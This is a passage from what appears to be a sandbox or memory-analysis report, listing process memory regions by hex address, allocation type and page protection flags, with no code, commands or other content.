heap
|
page read and write
|
||
22AA5F28000
|
heap
|
page read and write
|
||
160A63B0000
|
heap
|
page read and write
|
||
1E080691000
|
direct allocation
|
page read and write
|
||
1CA37F76000
|
heap
|
page read and write
|
||
160A4429000
|
heap
|
page read and write
|
||
22AA5A43000
|
heap
|
page read and write
|
||
8520DFF000
|
stack
|
page read and write
|
||
58276FF000
|
unkown
|
page read and write
|
||
1BEA7CA7000
|
heap
|
page read and write
|
||
22AA5F4A000
|
heap
|
page read and write
|
||
22AA5A1B000
|
heap
|
page read and write
|
||
7FF7E2F31000
|
unkown
|
page execute read
|
||
1B7EC648000
|
heap
|
page read and write
|
||
2BAFE0A5000
|
heap
|
page read and write
|
||
25A1538B000
|
heap
|
page read and write
|
||
35FFD84000
|
stack
|
page read and write
|
||
1D726AE6000
|
heap
|
page read and write
|
||
2AD31950000
|
heap
|
page read and write
|
||
20C32F68000
|
heap
|
page read and write
|
||
1BEA7ED0000
|
heap
|
page read and write
|
||
1D726AE4000
|
heap
|
page read and write
|
||
5D2EFB000
|
stack
|
page read and write
|
||
7FFD9ADA0000
|
trusted library allocation
|
page read and write
|
||
D6CC0FC000
|
stack
|
page read and write
|
||
1B7ECE1B000
|
heap
|
page read and write
|
||
202AC240000
|
heap
|
page read and write
|
||
19D36110000
|
heap
|
page read and write
|
||
20C32F55000
|
heap
|
page read and write
|
||
7FF7ADE51000
|
unkown
|
page execute read
|
||
22AA59A0000
|
heap
|
page read and write
|
||
1B7EC630000
|
heap
|
page read and write
|
||
252A3BB1000
|
heap
|
page read and write
|
||
1B7EC1A0000
|
direct allocation
|
page read and write
|
||
25A153A4000
|
heap
|
page read and write
|
||
1CE8FAC3000
|
heap
|
page read and write
|
||
7FFE13221000
|
unkown
|
page execute and read and write
|
||
202AC187000
|
heap
|
page read and write
|
||
1B7EC637000
|
heap
|
page read and write
|
||
160A43C3000
|
heap
|
page read and write
|
||
1B7EDE00000
|
direct allocation
|
page read and write
|
||
1EAC1C70000
|
heap
|
page read and write
|
||
1B7ECC61000
|
heap
|
page read and write
|
||
202AC641000
|
heap
|
page read and write
|
||
7FFE13310000
|
unkown
|
page readonly
|
||
7FFD9AA46000
|
trusted library allocation
|
page read and write
|
||
1B7ECC1B000
|
heap
|
page read and write
|
||
19D36022000
|
heap
|
page read and write
|
||
1B7ECC9B000
|
heap
|
page read and write
|
||
1B7ECE28000
|
heap
|
page read and write
|
||
1B7EDE40000
|
direct allocation
|
page read and write
|
||
202AC621000
|
heap
|
page read and write
|
||
3270C8000
|
stack
|
page read and write
|
||
1E0FE970000
|
heap
|
page read and write
|
||
1CA7B310000
|
heap
|
page read and write
|
||
24C8F020000
|
heap
|
page read and write
|
||
1B7ECD3D000
|
heap
|
page read and write
|
||
2A1D479000
|
stack
|
page read and write
|
||
1B7ECE26000
|
heap
|
page read and write
|
||
1B7ECF13000
|
heap
|
page read and write
|
||
35800FF000
|
stack
|
page read and write
|
||
160A49F4000
|
heap
|
page read and write
|
||
1E0FD0E2000
|
heap
|
page read and write
|
||
19D36076000
|
heap
|
page read and write
|
||
1B7EDD70000
|
direct allocation
|
page read and write
|
||
7FF7ADE51000
|
unkown
|
page execute read
|
||
1B7EDD90000
|
direct allocation
|
page read and write
|
||
22AA59B7000
|
heap
|
page read and write
|
||
7FFDFAC98000
|
unkown
|
page execute and write copy
|
||
202AE034000
|
heap
|
page read and write
|
||
1CE8FB3F000
|
heap
|
page read and write
|
||
202AC2C0000
|
heap
|
page read and write
|
||
1B7ECE26000
|
heap
|
page read and write
|
||
1CA1E290000
|
heap
|
page read and write
|
||
2BAFE080000
|
heap
|
page read and write
|
||
7FFE11540000
|
unkown
|
page execute and write copy
|
||
1D807501000
|
heap
|
page read and write
|
||
1CA381A7000
|
heap
|
page read and write
|
||
20ED9370000
|
heap
|
page read and write
|
||
1B7ECDF9000
|
heap
|
page read and write
|
||
1B7ECEDF000
|
heap
|
page read and write
|
||
1CE8C97D000
|
heap
|
page read and write
|
||
1CE8FAED000
|
heap
|
page read and write
|
||
6ABCF1C000
|
stack
|
page read and write
|
||
1FBE38C0000
|
heap
|
page read and write
|
||
1B7EC1C0000
|
direct allocation
|
page read and write
|
||
1E0FD0B9000
|
heap
|
page read and write
|
||
7FFE148C6000
|
unkown
|
page execute and write copy
|
||
25A1537F000
|
heap
|
page read and write
|
||
1B7EDDB0000
|
direct allocation
|
page read and write
|
||
1CE8C9B1000
|
heap
|
page read and write
|
||
22AA5F27000
|
heap
|
page read and write
|
||
1B7ECC33000
|
heap
|
page read and write
|
||
1B7ECBDC000
|
heap
|
page read and write
|
||
7FFDFB490000
|
unkown
|
page execute and read and write
|
||
1B7ECDC0000
|
heap
|
page read and write
|
||
1F4256AC000
|
heap
|
page read and write
|
||
1B7ECC7E000
|
heap
|
page read and write
|
||
7DF4D42F0000
|
trusted library allocation
|
page execute and read and write
|
||
160A4A09000
|
heap
|
page read and write
|
||
22AA59F6000
|
heap
|
page read and write
|
||
5038AFF000
|
stack
|
page read and write
|
||
7FFDFB012000
|
unkown
|
page execute and read and write
|
||
1D726AE4000
|
heap
|
page read and write
|
||
25A1538B000
|
heap
|
page read and write
|
||
7FFDFB486000
|
unkown
|
page execute and read and write
|
||
160A4A19000
|
heap
|
page read and write
|
||
19D37F3E000
|
heap
|
page read and write
|
||
7FFE00422000
|
unkown
|
page execute and read and write
|
||
1B7ECCEA000
|
heap
|
page read and write
|
||
1B7ECDA0000
|
heap
|
page read and write
|
||
1CE8EADC000
|
heap
|
page read and write
|
||
22AA5A3C000
|
heap
|
page read and write
|
||
185A2547000
|
heap
|
page read and write
|
||
22AA5A0D000
|
heap
|
page read and write
|
||
1F521860000
|
heap
|
page read and write
|
||
194D7668000
|
heap
|
page read and write
|
||
19D36083000
|
heap
|
page read and write
|
||
1E080646000
|
direct allocation
|
page read and write
|
||
1B7ECEB5000
|
heap
|
page read and write
|
||
22AA5A39000
|
heap
|
page read and write
|
||
1B7ECC76000
|
heap
|
page read and write
|
||
1B7ECDC1000
|
heap
|
page read and write
|
||
1CA382B0000
|
heap
|
page read and write
|
||
2BAFE09E000
|
heap
|
page read and write
|
||
19D36205000
|
heap
|
page read and write
|
||
1B7ECC26000
|
heap
|
page read and write
|
||
1CE8FAF5000
|
heap
|
page read and write
|
||
1B7EC347000
|
heap
|
page read and write
|
||
202AC1A0000
|
heap
|
page read and write
|
||
185BBF79000
|
heap
|
page read and write
|
||
1FBE38C0000
|
heap
|
page read and write
|
||
1B7EDDE0000
|
direct allocation
|
page read and write
|
||
25A14E1E000
|
heap
|
page read and write
|
||
22AA59F6000
|
heap
|
page read and write
|
||
268F4E75000
|
heap
|
page read and write
|
||
1A2AB190000
|
heap
|
page read and write
|
||
268F4FC0000
|
heap
|
page read and write
|
||
1B7ECDD0000
|
heap
|
page read and write
|
||
26C3D9FA000
|
heap
|
page read and write
|
||
1CE8E230000
|
heap
|
page read and write
|
||
160A4360000
|
heap
|
page read and write
|
||
22AA59F6000
|
heap
|
page read and write
|
||
22AA5A1A000
|
heap
|
page read and write
|
||
160A43BC000
|
heap
|
page read and write
|
||
22AA5910000
|
heap
|
page read and write
|
||
202AC737000
|
heap
|
page read and write
|
||
160A43EC000
|
heap
|
page read and write
|
||
1B7ECE26000
|
heap
|
page read and write
|
||
1E080670000
|
direct allocation
|
page read and write
|
||
22CC0F70000
|
heap
|
page read and write
|
||
1B7ECDD3000
|
heap
|
page read and write
|
||
1B7EE1E0000
|
direct allocation
|
page read and write
|
||
160A443A000
|
heap
|
page read and write
|
||
5D30FF000
|
stack
|
page read and write
|
||
1B7ECDF4000
|
heap
|
page read and write
|
||
160A4A17000
|
heap
|
page read and write
|
||
19A85D6A000
|
heap
|
page read and write
|
||
22AA59FB000
|
heap
|
page read and write
|
||
1B7EC7EC000
|
heap
|
page read and write
|
||
1D726AE6000
|
heap
|
page read and write
|
||
1B7ECD70000
|
heap
|
page read and write
|
||
259EBDF000
|
stack
|
page read and write
|
||
1B7ECD70000
|
heap
|
page read and write
|
||
1B7EC78C000
|
heap
|
page read and write
|
||
1FF5A550000
|
heap
|
page read and write
|
||
20C32F7D000
|
heap
|
page read and write
|
||
1B7ED9F0000
|
direct allocation
|
page read and write
|
||
20C32E50000
|
heap
|
page read and write
|
||
1B7EC363000
|
heap
|
page read and write
|
||
1B7ECD2C000
|
heap
|
page read and write
|
||
17DDA421000
|
heap
|
page read and write
|
||
1B7ECD39000
|
heap
|
page read and write
|
||
202AC0C0000
|
heap
|
page read and write
|
||
1B7ECE1B000
|
heap
|
page read and write
|
||
1FA18EC9000
|
heap
|
page read and write
|
||
1B7EC190000
|
direct allocation
|
page read and write
|
||
1B7ECEB5000
|
heap
|
page read and write
|
||
22AA59FD000
|
heap
|
page read and write
|
||
6AC93FF000
|
stack
|
page read and write
|
||
11C924C0000
|
heap
|
page read and write
|
||
160A4A13000
|
heap
|
page read and write
|
||
1D807490000
|
heap
|
page read and write
|
||
22AA57F0000
|
heap
|
page read and write
|
||
1B7EDDE0000
|
direct allocation
|
page read and write
|
||
1F4254C0000
|
heap
|
page read and write
|
||
1B7EA7C0000
|
heap
|
page read and write
|
||
1EAC1D11000
|
heap
|
page read and write
|
||
1FA18EBB000
|
heap
|
page read and write
|
||
1CA37FDB000
|
heap
|
page read and write
|
||
160A4330000
|
trusted library allocation
|
page read and write
|
||
1B7EC331000
|
heap
|
page read and write
|
||
11C921D0000
|
heap
|
page read and write
|
||
7FFD9ABD0000
|
trusted library allocation
|
page read and write
|
||
252A3BB1000
|
heap
|
page read and write
|
||
1FF5A5FD000
|
heap
|
page read and write
|
||
1B7ECC94000
|
heap
|
page read and write
|
||
1EAC1CF0000
|
heap
|
page read and write
|
||
160A4460000
|
trusted library allocation
|
page read and write
|
||
1CA388E0000
|
heap
|
page read and write
|
||
5038A7F000
|
stack
|
page read and write
|
||
70C16FC000
|
stack
|
page read and write
|
||
142338C1000
|
heap
|
page read and write
|
||
1B7ECD11000
|
heap
|
page read and write
|
||
1B7ECC10000
|
heap
|
page read and write
|
||
1BF9D2DC000
|
heap
|
page read and write
|
||
25A16D00000
|
heap
|
page read and write
|
||
1CE8C955000
|
heap
|
page read and write
|
||
26C3DA10000
|
heap
|
page read and write
|
||
7FFD9AC60000
|
trusted library allocation
|
page read and write
|
||
1B7ECD61000
|
heap
|
page read and write
|
||
25A14BD6000
|
heap
|
page read and write
|
||
202AC140000
|
heap
|
page read and write
|
||
1B7ECC94000
|
heap
|
page read and write
|
||
7FFD9A99D000
|
trusted library allocation
|
page execute and read and write
|
||
1B7EC69B000
|
heap
|
page read and write
|
||
13A07140000
|
heap
|
page read and write
|
||
202AC624000
|
heap
|
page read and write
|
||
1CA37E22000
|
trusted library allocation
|
page read and write
|
||
1E0FD0B0000
|
heap
|
page read and write
|
||
1E0FE950000
|
direct allocation
|
page read and write
|
||
7FFDFB151000
|
unkown
|
page execute and read and write
|
||
1B7EC7A4000
|
heap
|
page read and write
|
||
1CA382D6000
|
heap
|
page read and write
|
||
1CA202BE000
|
trusted library allocation
|
page read and write
|
||
1FBE3810000
|
heap
|
page read and write
|
||
1B7ECC43000
|
heap
|
page read and write
|
||
22AA594E000
|
heap
|
page read and write
|
||
1CA202CA000
|
trusted library allocation
|
page read and write
|
||
7FF7ADE93000
|
unkown
|
page readonly
|
||
1B7EDFD0000
|
direct allocation
|
page read and write
|
||
1B7ECD3D000
|
heap
|
page read and write
|
||
1B7EC69F000
|
heap
|
page read and write
|
||
1B7EC6A2000
|
heap
|
page read and write
|
||
25A14BC0000
|
heap
|
page read and write
|
||
2B6D4FF000
|
unkown
|
page read and write
|
||
1E0FD0E6000
|
heap
|
page read and write
|
||
1B7ECD28000
|
heap
|
page read and write
|
||
1B7ECDDB000
|
heap
|
page read and write
|
||
1B7EC6F1000
|
heap
|
page read and write
|
||
1F42569E000
|
heap
|
page read and write
|
||
1B7ECB6B000
|
heap
|
page read and write
|
||
259EEFE000
|
stack
|
page read and write
|
||
160A43C2000
|
heap
|
page read and write
|
||
1B7ECDF0000
|
heap
|
page read and write
|
||
142338A0000
|
heap
|
page read and write
|
||
1E0FD0B1000
|
heap
|
page read and write
|
||
1B7ECF39000
|
heap
|
page read and write
|
||
7FF7ADE8F000
|
unkown
|
page read and write
|
||
202AC2CB000
|
heap
|
page read and write
|
||
22AA5A36000
|
heap
|
page read and write
|
||
1F4256B7000
|
heap
|
page read and write
|
||
19D36061000
|
heap
|
page read and write
|
||
25A15382000
|
heap
|
page read and write
|
||
1CE8FA6C000
|
heap
|
page read and write
|
||
1B7ED4BC000
|
heap
|
page read and write
|
||
1B7EC331000
|
heap
|
page read and write
|
||
1B7EC6F4000
|
heap
|
page read and write
|
||
2BAFE0B7000
|
heap
|
page read and write
|
||
19A85D81000
|
heap
|
page read and write
|
||
1E080719000
|
direct allocation
|
page read and write
|
||
25A14BD6000
|
heap
|
page read and write
|
||
202AC198000
|
heap
|
page read and write
|
||
1B7EC190000
|
direct allocation
|
page read and write
|
||
1B7ECC72000
|
heap
|
page read and write
|
||
1FBE3830000
|
heap
|
page read and write
|
||
1B7ECD81000
|
heap
|
page read and write
|
||
1B7EC3B3000
|
heap
|
page read and write
|
||
160A49DE000
|
heap
|
page read and write
|
||
7FFD9ADB0000
|
trusted library allocation
|
page read and write
|
||
1B7EC1D0000
|
direct allocation
|
page read and write
|
||
1AABE530000
|
heap
|
page read and write
|
||
25A14BE5000
|
heap
|
page read and write
|
||
1CA2020F000
|
trusted library allocation
|
page read and write
|
||
1CE8C930000
|
heap
|
page read and write
|
||
1B7EC30E000
|
heap
|
page read and write
|
||
194D7645000
|
heap
|
page read and write
|
||
19D366AD000
|
heap
|
page read and write
|
||
1B7ECDDC000
|
heap
|
page read and write
|
||
7FFE1153D000
|
unkown
|
page execute and read and write
|
||
1CA1FD80000
|
heap
|
page readonly
|
||
1E0FEA10000
|
heap
|
page read and write
|
||
1B7ECC2E000
|
heap
|
page read and write
|
||
18985FF000
|
unkown
|
page read and write
|
||
22AA5F32000
|
heap
|
page read and write
|
||
17DDA40A000
|
heap
|
page read and write
|
||
22CC0F7A000
|
heap
|
page read and write
|
||
1B7ECF55000
|
heap
|
page read and write
|
||
19D3604F000
|
heap
|
page read and write
|
||
1CA38146000
|
heap
|
page execute and read and write
|
||
1CE90314000
|
heap
|
page read and write
|
||
1CA7B3F0000
|
heap
|
page read and write
|
||
2DF513D1000
|
heap
|
page read and write
|
||
1B7ECDE3000
|
heap
|
page read and write
|
||
1B7ED577000
|
heap
|
page read and write
|
||
13A07240000
|
heap
|
page read and write
|
||
13A07138000
|
heap
|
page read and write
|
||
19A85D81000
|
heap
|
page read and write
|
||
160A4421000
|
heap
|
page read and write
|
||
160A4429000
|
heap
|
page read and write
|
||
24C8F2A0000
|
heap
|
page read and write
|
||
1B7ECD06000
|
heap
|
page read and write
|
||
1CE8E330000
|
heap
|
page read and write
|
||
1B7ECD1D000
|
heap
|
page read and write
|
||
1D726AE7000
|
heap
|
page read and write
|
||
1CE8FAF5000
|
heap
|
page read and write
|
||
13B455FA000
|
heap
|
page read and write
|
||
1BEA7CB1000
|
heap
|
page read and write
|
||
185BC73D000
|
heap
|
page read and write
|
||
185BC733000
|
heap
|
page read and write
|
||
19D3669F000
|
heap
|
page read and write
|
||
1FA18EA6000
|
heap
|
page read and write
|
||
1CE8CA2B000
|
heap
|
page read and write
|
||
1FA18D30000
|
heap
|
page read and write
|
||
22E56890000
|
heap
|
page read and write
|
||
268F4EC0000
|
heap
|
page read and write
|
||
1B7EDA1C000
|
direct allocation
|
page read and write
|
||
1B7ECC2A000
|
heap
|
page read and write
|
||
7FFD9ACE0000
|
trusted library allocation
|
page read and write
|
||
22AA59D7000
|
heap
|
page read and write
|
||
25A14BB2000
|
heap
|
page read and write
|
||
11C921B0000
|
heap
|
page read and write
|
||
1B7EDA3B000
|
heap
|
page read and write
|
||
202AC169000
|
heap
|
page read and write
|
||
160A4A09000
|
heap
|
page read and write
|
||
1B7ECD37000
|
heap
|
page read and write
|
||
1B7ECD84000
|
heap
|
page read and write
|
||
7FFE148E3000
|
unkown
|
page readonly
|
||
185BC4B0000
|
heap
|
page read and write
|
||
14233850000
|
heap
|
page read and write
|
||
1B7ECCC9000
|
heap
|
page read and write
|
||
22AA590B000
|
heap
|
page read and write
|
||
1FF5A450000
|
heap
|
page read and write
|
||
1CA381A5000
|
heap
|
page read and write
|
||
1EAC1D11000
|
heap
|
page read and write
|
||
20ED95D0000
|
heap
|
page read and write
|
||
22CC0F7C000
|
heap
|
page read and write
|
||
1B7EC6D0000
|
heap
|
page read and write
|
||
1CA20175000
|
trusted library allocation
|
page read and write
|
||
23C913B0000
|
heap
|
page read and write
|
||
1CE8FABD000
|
heap
|
page read and write
|
||
1B7ECF60000
|
heap
|
page read and write
|
||
1B7ECC61000
|
heap
|
page read and write
|
||
185BC465000
|
heap
|
page read and write
|
||
19D36027000
|
heap
|
page read and write
|
||
1D726AB0000
|
heap
|
page readonly
|
||
CD7E8FF000
|
unkown
|
page read and write
|
||
7FFDFB493000
|
unkown
|
page execute and read and write
|
||
1CA21443000
|
trusted library allocation
|
page read and write
|
||
1E0FD0DA000
|
heap
|
page read and write
|
||
7FFDFB0E1000
|
unkown
|
page execute and read and write
|
||
1B7EC821000
|
heap
|
page read and write
|
||
1BF9D2FF000
|
heap
|
page read and write
|
||
17ACFB30000
|
heap
|
page read and write
|
||
22AA5A12000
|
heap
|
page read and write
|
||
24C8F400000
|
heap
|
page read and write
|
||
A7AA27F000
|
stack
|
page read and write
|
||
19D36080000
|
heap
|
page read and write
|
||
7FFE13338000
|
unkown
|
page execute and read and write
|
||
160A44CD000
|
heap
|
page read and write
|
||
160A4421000
|
heap
|
page read and write
|
||
17ACFDF5000
|
heap
|
page read and write
|
||
9512FF000
|
stack
|
page read and write
|
||
161FEF61000
|
heap
|
page read and write
|
||
A456FB000
|
stack
|
page read and write
|
||
D7F708D000
|
stack
|
page read and write
|
||
251C6AA0000
|
heap
|
page read and write
|
||
1B7ED2C4000
|
heap
|
page read and write
|
||
2AD31680000
|
heap
|
page read and write
|
||
7FFD9AA46000
|
trusted library allocation
|
page read and write
|
||
1B7ED7A0000
|
direct allocation
|
page read and write
|
||
1B7ED498000
|
heap
|
page read and write
|
||
6AC8BDE000
|
stack
|
page read and write
|
||
7FFE13220000
|
unkown
|
page readonly
|
||
F0541FC000
|
stack
|
page read and write
|
||
1B7ECDB3000
|
heap
|
page read and write
|
||
202AC19B000
|
heap
|
page read and write
|
||
1F425678000
|
heap
|
page read and write
|
||
1FA18E78000
|
heap
|
page read and write
|
||
185A5D74000
|
trusted library allocation
|
page read and write
|
||
1AABE1F0000
|
heap
|
page read and write
|
||
943ABFE000
|
stack
|
page read and write
|
||
1B7EC1C0000
|
direct allocation
|
page read and write
|
||
1B7ECCCD000
|
heap
|
page read and write
|
||
1CE8FAED000
|
heap
|
page read and write
|
||
25A14BE6000
|
heap
|
page read and write
|
||
22CC0F56000
|
heap
|
page read and write
|
||
1B7EDE20000
|
direct allocation
|
page read and write
|
||
2AD31660000
|
heap
|
page read and write
|
||
7FFD9ABB0000
|
trusted library allocation
|
page read and write
|
||
2240CA31000
|
heap
|
page read and write
|
||
7FFDFB010000
|
unkown
|
page execute and read and write
|
||
1B7ECD39000
|
heap
|
page read and write
|
||
2A1CDCE000
|
stack
|
page read and write
|
||
1F23DF70000
|
heap
|
page read and write
|
||
1B7EA860000
|
heap
|
page read and write
|
||
160A49F1000
|
heap
|
page read and write
|
||
1BF9D2FD000
|
heap
|
page read and write
|
||
1F4256BD000
|
heap
|
page read and write
|
||
160A49FE000
|
heap
|
page read and write
|
||
1CA1E205000
|
heap
|
page read and write
|
||
1B7ED488000
|
heap
|
page read and write
|
||
1F23DEA0000
|
heap
|
page read and write
|
||
1CA201FF000
|
trusted library allocation
|
page read and write
|
||
185B3F71000
|
trusted library allocation
|
page read and write
|
||
1B7EC7AE000
|
heap
|
page read and write
|
||
25A14EED000
|
heap
|
page read and write
|
||
1B7EDDE0000
|
direct allocation
|
page read and write
|
||
1B7ECDD0000
|
heap
|
page read and write
|
||
1B7ECCF8000
|
heap
|
page read and write
|
||
3F8B3FF000
|
unkown
|
page read and write
|
||
25A1539A000
|
heap
|
page read and write
|
||
19D366B9000
|
heap
|
page read and write
|
||
1BF9D2D9000
|
heap
|
page read and write
|
||
194D769E000
|
heap
|
page read and write
|
||
22AA59F0000
|
heap
|
page read and write
|
||
1CA37F84000
|
heap
|
page read and write
|
||
1CE8FA99000
|
heap
|
page read and write
|
||
167DAEC7000
|
heap
|
page read and write
|
||
202AC638000
|
heap
|
page read and write
|
||
1B7EC819000
|
heap
|
page read and write
|
||
7FFE1A471000
|
unkown
|
page execute and read and write
|
||
160A439A000
|
heap
|
page read and write
|
||
1B7ECDD3000
|
heap
|
page read and write
|
||
22CC0F00000
|
heap
|
page read and write
|
||
185BC406000
|
heap
|
page read and write
|
||
1B7EC7B1000
|
heap
|
page read and write
|
||
1CE8C9DF000
|
heap
|
page read and write
|
||
11C921C8000
|
heap
|
page read and write
|
||
194D761F000
|
heap
|
page read and write
|
||
1B7ECDEF000
|
heap
|
page read and write
|
||
25A153A2000
|
heap
|
page read and write
|
||
6232F9F000
|
stack
|
page read and write
|
||
7FFD9AE00000
|
trusted library allocation
|
page read and write
|
||
11C92160000
|
heap
|
page read and write
|
||
1CE8C8E0000
|
heap
|
page read and write
|
||
3F82E7F000
|
stack
|
page read and write
|
||
7FF7ADE7C000
|
unkown
|
page readonly
|
||
1F8A3D90000
|
heap
|
page read and write
|
||
202AE022000
|
heap
|
page read and write
|
||
1B7ECC10000
|
heap
|
page read and write
|
||
160A4445000
|
heap
|
page read and write
|
||
1B7ECD51000
|
heap
|
page read and write
|
||
1BF9D2D7000
|
heap
|
page read and write
|
||
1B7EC7AC000
|
heap
|
page read and write
|
||
1B7EDDA0000
|
direct allocation
|
page read and write
|
||
35803FE000
|
stack
|
page read and write
|
||
1B7ECE26000
|
heap
|
page read and write
|
||
1B7EDDE0000
|
direct allocation
|
page read and write
|
||
1CE8C9D8000
|
heap
|
page read and write
|
||
19D36200000
|
heap
|
page read and write
|
||
1B7ECDF4000
|
heap
|
page read and write
|
||
160A4396000
|
heap
|
page read and write
|
||
1B7EC7AA000
|
heap
|
page read and write
|
||
1F425693000
|
heap
|
page read and write
|
||
7FF7ADE93000
|
unkown
|
page readonly
|
||
19D3602C000
|
heap
|
page read and write
|
||
7FFE1A47E000
|
unkown
|
page read and write
|
||
1BF9D2CB000
|
heap
|
page read and write
|
||
1B7EC77D000
|
heap
|
page read and write
|
||
7FFD9AD00000
|
trusted library allocation
|
page read and write
|
||
1B7ECDF9000
|
heap
|
page read and write
|
||
1CA1DFD0000
|
heap
|
page read and write
|
||
7FFDFAC37000
|
unkown
|
page execute and read and write
|
||
1B7ECE31000
|
heap
|
page read and write
|
||
1B7ECD02000
|
heap
|
page read and write
|
||
2739F730000
|
heap
|
page read and write
|
||
1B7ECEB5000
|
heap
|
page read and write
|
||
25A14BC4000
|
heap
|
page read and write
|
||
7FFE11530000
|
unkown
|
page execute and read and write
|
||
19D366A7000
|
heap
|
page read and write
|
||
7E8ADFF000
|
stack
|
page read and write
|
||
1B7ECF59000
|
heap
|
page read and write
|
||
25A14BD8000
|
heap
|
page read and write
|
||
936FFFF000
|
unkown
|
page read and write
|
||
25A14BED000
|
heap
|
page read and write
|
||
22F00FF000
|
stack
|
page read and write
|
||
943AC7F000
|
stack
|
page read and write
|
||
25A14E13000
|
heap
|
page read and write
|
||
1B7EC37B000
|
heap
|
page read and write
|
||
1CE8C974000
|
heap
|
page read and write
|
||
2739F700000
|
heap
|
page read and write
|
||
19D36074000
|
heap
|
page read and write
|
||
25A14B00000
|
trusted library allocation
|
page read and write
|
||
1B7ECE48000
|
heap
|
page read and write
|
||
15EDF170000
|
heap
|
page read and write
|
||
1D8074F8000
|
heap
|
page read and write
|
||
1CE8FAB5000
|
heap
|
page read and write
|
||
185A26C5000
|
heap
|
page read and write
|
||
1B7EC3D4000
|
heap
|
page read and write
|
||
25A14E17000
|
heap
|
page read and write
|
||
25A14BD0000
|
heap
|
page read and write
|
||
19A85D79000
|
heap
|
page read and write
|
||
7FFDFAB80000
|
unkown
|
page readonly
|
||
202AC62F000
|
heap
|
page read and write
|
||
26C3DB60000
|
heap
|
page read and write
|
||
32714F000
|
stack
|
page read and write
|
||
7FFE11511000
|
unkown
|
page execute and read and write
|
||
309A36C000
|
stack
|
page read and write
|
||
185B3F91000
|
trusted library allocation
|
page read and write
|
||
1B7EDDC0000
|
direct allocation
|
page read and write
|
||
1E0FD0F3000
|
heap
|
page read and write
|
||
1B7EC26C000
|
direct allocation
|
page read and write
|
||
7FFD9AA40000
|
trusted library allocation
|
page read and write
|
||
22AA5A3B000
|
heap
|
page read and write
|
||
22CC1210000
|
heap
|
page read and write
|
||
1B7EC78C000
|
heap
|
page read and write
|
||
2DF515E0000
|
heap
|
page read and write
|
||
19D366BC000
|
heap
|
page read and write
|
||
19D366CA000
|
heap
|
page read and write
|
||
1B7ECDEF000
|
heap
|
page read and write
|
||
19D35EB0000
|
heap
|
page read and write
|
||
7FFD9ACD0000
|
trusted library allocation
|
page read and write
|
||
160A49FE000
|
heap
|
page read and write
|
||
8080FE000
|
stack
|
page read and write
|
||
160A43B2000
|
heap
|
page read and write
|
||
1CE8C954000
|
heap
|
page read and write
|
||
7FF7E2FD8000
|
unkown
|
page readonly
|
||
9510FB000
|
stack
|
page read and write
|
||
19D36082000
|
heap
|
page read and write
|
||
1E0FD11B000
|
heap
|
page read and write
|
||
185A5D4F000
|
trusted library allocation
|
page read and write
|
||
26C3DB50000
|
heap
|
page read and write
|
||
1D726AE5000
|
heap
|
page read and write
|
||
1B7ECC34000
|
heap
|
page read and write
|
||
19D3620B000
|
heap
|
page read and write
|
||
1D726AE3000
|
heap
|
page read and write
|
||
7FFD9AC90000
|
trusted library allocation
|
page read and write
|
||
35FFDA4000
|
stack
|
page read and write
|
||
1CA1FD90000
|
heap
|
page read and write
|
||
1A2AB1B1000
|
heap
|
page read and write
|
||
1B7ECD19000
|
heap
|
page read and write
|
||
202AC1BE000
|
heap
|
page read and write
|
||
1B7ECC7E000
|
heap
|
page read and write
|
||
160A49E7000
|
heap
|
page read and write
|
||
22AA5F35000
|
heap
|
page read and write
|
||
91BB87F000
|
stack
|
page read and write
|
||
25A14E10000
|
heap
|
page read and write
|
||
7FFD9AD20000
|
trusted library allocation
|
page read and write
|
||
1CE8CA2C000
|
heap
|
page read and write
|
||
202AE02D000
|
heap
|
page read and write
|
||
202AC73B000
|
heap
|
page read and write
|
||
185BC590000
|
heap
|
page read and write
|
||
1B7ECC24000
|
heap
|
page read and write
|
||
1B7ECB5B000
|
heap
|
page read and write
|
||
1BEA7CA7000
|
heap
|
page read and write
|
||
1E0FD14C000
|
heap
|
page read and write
|
||
1CE8FADD000
|
heap
|
page read and write
|
||
7FF7E2FDE000
|
unkown
|
page readonly
|
||
1B7EC351000
|
heap
|
page read and write
|
||
1FF5A5FB000
|
heap
|
page read and write
|
||
1CE8FAED000
|
heap
|
page read and write
|
||
20ED9490000
|
heap
|
page read and write
|
||
7FFE126EF000
|
unkown
|
page execute and read and write
|
||
24C8F040000
|
heap
|
page read and write
|
||
185BC567000
|
heap
|
page execute and read and write
|
||
1CE8FAC9000
|
heap
|
page read and write
|
||
19D36080000
|
heap
|
page read and write
|
||
22CC0F45000
|
heap
|
page read and write
|
||
160A43EC000
|
heap
|
page read and write
|
||
19D37F33000
|
heap
|
page read and write
|
||
1B7ECC76000
|
heap
|
page read and write
|
||
22AA58F0000
|
trusted library allocation
|
page read and write
|
||
1B7EA7B0000
|
heap
|
page readonly
|
||
7FFE14641000
|
unkown
|
page execute and read and write
|
||
167DAD90000
|
heap
|
page read and write
|
||
1B7EC1A0000
|
direct allocation
|
page read and write
|
||
1E0FD145000
|
heap
|
page read and write
|
||
1CE8C97D000
|
heap
|
page read and write
|
||
1B7ED634000
|
heap
|
page read and write
|
||
C50ADDF000
|
stack
|
page read and write
|
||
24C8F0D0000
|
heap
|
page read and write
|
||
1B7ECDA0000
|
heap
|
page read and write
|
||
185BC3D1000
|
heap
|
page read and write
|
||
1B7EC6CA000
|
heap
|
page read and write
|
||
1B7ECB1A000
|
heap
|
page read and write
|
||
1B7ECC61000
|
heap
|
page read and write
|
||
1B7ECC7A000
|
heap
|
page read and write
|
||
22AA781D000
|
heap
|
page read and write
|
||
1B7ECD2C000
|
heap
|
page read and write
|
||
22CC0F4B000
|
heap
|
page read and write
|
||
1B7ED9FC000
|
direct allocation
|
page read and write
|
||
160A44C0000
|
heap
|
page read and write
|
||
5D2FFF000
|
unkown
|
page read and write
|
||
6AC9278000
|
stack
|
page read and write
|
||
1B7ECE7C000
|
heap
|
page read and write
|
||
1B7ECD49000
|
heap
|
page read and write
|
||
1B7EC6BE000
|
heap
|
page read and write
|
||
1B7ECA30000
|
heap
|
page read and write
|
||
7FFE126D1000
|
unkown
|
page execute and read and write
|
||
202AC61C000
|
heap
|
page read and write
|
||
32757F000
|
stack
|
page read and write
|
||
1B7ECD13000
|
heap
|
page read and write
|
||
7FF7E2FD6000
|
unkown
|
page read and write
|
||
1D726AE4000
|
heap
|
page read and write
|
||
1CE8E29F000
|
heap
|
page read and write
|
||
185BC550000
|
trusted library allocation
|
page read and write
|
||
1B7ECA31000
|
heap
|
page read and write
|
||
2DF513D1000
|
heap
|
page read and write
|
||
22AA59FF000
|
heap
|
page read and write
|
||
1B7ED98C000
|
direct allocation
|
page read and write
|
||
1B7EC368000
|
heap
|
page read and write
|
||
1B7EC78D000
|
heap
|
